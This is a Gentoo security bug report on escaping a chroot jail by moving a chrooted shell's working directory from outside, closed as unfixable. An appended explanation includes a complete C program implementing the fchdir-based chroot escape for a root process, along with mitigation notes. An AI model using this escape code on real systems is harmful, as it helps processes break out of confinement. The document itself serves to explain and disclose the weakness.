
Bug 48872

Summary: Escaping from chroot with help from outside by moving out current working directory
Product: Gentoo Security
Reporter: Tim Weber <scy-bugs-gentoo>
Component: Vulnerabilities
Assignee: Gentoo Security <security>
Status: RESOLVED CANTFIX    
Severity: major    
Priority: High    
Version: unspecified   
Hardware: All   
OS: Linux   
Whiteboard:
Package list:
Runtime testing required: ---

Description Tim Weber 2004-04-24 05:13:38 UTC
It looks to me that it is possible to escape from a chroot jail with help from outside. Specifically, when someone not inside the chroot moves out the current working directory of someone inside the chroot, the guy inside can use multiple "cd .."'s to finally get to the real root directory.

Reproducible: Always
Steps to Reproduce:
1. Create a directory called "/new" and copy a Gentoo stage1 tarball inside to make it somewhat usable. Create a directory called "/new.store"
2. Open up two root shells. (Maybe this works with user shells as well, didn't try it.)
3. Do the following commands in shell A:
serv0r root # cd / 
serv0r / # chroot /new /bin/bash 
serv0r / # cd usr 
serv0r usr # mkdir escape 
serv0r usr # cd escape
4. Do the following command in shell B:
serv0r root # mv /new/usr/escape /new.store/
5. Do the following commands in shell A:
serv0r escape # ls 
serv0r escape # pwd 
/usr/escape 
serv0r escape # cd .. 
serv0r new.store # ls 
escape  usr 
serv0r new.store # pwd 
/new.store
Actual Results:  
As you can see, the chrooted shell A can now access the directory 
"/new.store". By using "cd .." again he would be able to change to the real 
root directory, despite being chrooted to "/new". 

Expected Results:  
Either 
a) Disallow the "mv" of the current working directory of shell A's user or 
b) Put shell A's user inside "/usr" (which in fact is "/new/usr") after the 
"cd ..". 

I've posted this about one or two weeks ago in the forums 
(http://forums.gentoo.org/viewtopic.php?t=160772), but didn't have time to 
file a bug report. 
 
This has NOT been tested with up-to-date software, but was reproduced by 
forums moderator tomk, I guess he was using current packages. 
 
I was using chroot 5.0 (from coreutils-5.0-r5) and some older kernel (about 
2.4.22). Sorry I didn't check the precise kernel version, but I had very 
little time at that moment.
Comment 1 solar (RETIRED) gentoo-dev 2004-04-24 09:22:26 UTC
We can't fix this.
What you're talking about goes into the fundamental design of the kernel.

Note: there are also other ways to abuse a default chroot setup that don't require
external forces to help you, including iopl, shmat, ptrace, kill, mount, fchdir,
AF_UNIX sockets, chmod, mknod.

Changing resolution to CANTFIX
If you feel that we can fix this somehow then please attach a patch and reopen.
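The mechanism behind both the report and the "fchdir" entry in the list above is the same: on Linux, chroot(2) only sets the dentry at which a ".." lookup is clamped, and the clamp fires only when the path walk is standing on exactly that dentry. A working directory that lies outside the jail subtree (because someone moved it there, as in the report, or because the process kept a handle on it and then chroot()ed into a subdirectory) never passes through the jail root, so repeated "cd .." reaches the real root. The program below is an added example written for this page, not code from the bug report or from Gentoo. It assumes a prepared jail directory (the report's "/new") passed as argv[1], and it needs root, since chroot(2) requires CAP_SYS_CHROOT; that privilege requirement is also why the usual mitigations are dropping root inside the jail or using a mount namespace with pivot_root(2) instead of a bare chroot. The "escape" subdirectory name and the visibility check on argv[1] are choices made for the demonstration.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Count how many ".." hops it takes from `path` to a directory whose ".."
 * resolves to itself, which is how the kernel presents a root (the real one,
 * or the jail root for a chrooted process). Done with openat() so the caller's
 * own working directory is left untouched. Returns -1 on error. */
int dir_depth(const char *path)
{
    int fd = open(path, O_RDONLY | O_DIRECTORY);
    if (fd < 0)
        return -1;
    int hops = 0;
    for (;;) {
        struct stat here, up;
        int parent = openat(fd, "..", O_RDONLY | O_DIRECTORY);
        if (parent < 0 || fstat(fd, &here) < 0 || fstat(parent, &up) < 0) {
            if (parent >= 0)
                close(parent);
            close(fd);
            return -1;
        }
        int at_root = here.st_dev == up.st_dev && here.st_ino == up.st_ino;
        close(fd);
        fd = parent;
        if (at_root)
            break;
        hops++;
    }
    close(fd);
    return hops;
}

/* Self-help variant of the report's escape, for a root process inside a jail:
 * keep a handle on the current directory, chroot() into a fresh subdirectory so
 * that handle now lies outside the (new) jail root, fchdir() back to it, then
 * climb with ".." until the parent is the directory itself (the real root) and
 * chroot() there. Returns 0 on success, -1 on failure with errno set. */
int escape_chroot(void)
{
    int keep = open(".", O_RDONLY | O_DIRECTORY);
    if (keep < 0)
        return -1;
    /* "escape" is an arbitrary name chosen for this example */
    if (mkdir("escape", 0700) < 0 && errno != EEXIST) {
        close(keep);
        return -1;
    }
    if (chroot("escape") < 0 || fchdir(keep) < 0) {
        close(keep);
        return -1;
    }
    close(keep);
    /* cwd is now outside the jail root, so ".." is never clamped at the jail;
     * this loop is exactly the reporter's repeated "cd .." */
    for (;;) {
        struct stat here, up;
        if (stat(".", &here) < 0 || stat("..", &up) < 0)
            return -1;
        if (here.st_dev == up.st_dev && here.st_ino == up.st_ino)
            break;
        if (chdir("..") < 0)
            return -1;
    }
    return chroot(".");
}

/* Usage (as root): ./escape /new
 * Assumption: argv[1] is a prepared jail such as the stage1 tree in the report.
 * Before the escape, argv[1] is looked up relative to the jail root and is not
 * normally there; after the escape it is looked up relative to the real root. */
int main(int argc, char **argv)
{
    if (argc != 2 || geteuid() != 0) {
        fprintf(stderr, "usage (as root): %s <jail-dir>\n", argv[0]);
        printf("current directory is %d level(s) below the root\n", dir_depth("."));
        return 1;
    }
    if (chroot(argv[1]) < 0 || chdir("/") < 0) {
        perror("chroot");
        return 1;
    }
    printf("inside jail: %s visible? %s\n", argv[1],
           access(argv[1], F_OK) == 0 ? "yes" : "no");
    if (escape_chroot() < 0) {
        perror("escape_chroot");
        return 1;
    }
    printf("after escape: %s visible? %s\n", argv[1],
           access(argv[1], F_OK) == 0 ? "yes" : "no");
    return 0;
}
```

dir_depth() is the reusable piece: it is the same root test the escape loop relies on, and it also works from inside a jail, where it reports the distance to the jail root rather than to "/", which makes it a cheap way to check whether a process's working directory still sits inside its chroot.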